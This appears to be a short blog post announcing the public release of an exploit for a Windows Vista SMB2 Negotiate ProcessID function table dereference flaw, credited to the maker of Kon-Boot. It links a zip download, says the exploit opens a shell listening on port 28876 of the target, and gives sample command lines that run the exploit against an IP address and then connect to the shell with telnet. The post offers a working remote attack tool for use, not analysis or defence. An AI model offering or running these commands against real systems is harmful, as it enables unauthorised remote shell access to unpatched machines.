Piotr, who made Kon-Boot, finally decided to release the Vista SMB2 Negotiate ProcessID Function Table Dereference exploit code he’s been sitting on since last fall.
Download: smb2_exploit_release.zip
It should spawn a shell on TARGET_IP, listening on port 28876.
Sample usage
------------
> smb2_exploit.exe 192.167.0.5 45 0
> telnet 192.167.0.5 28876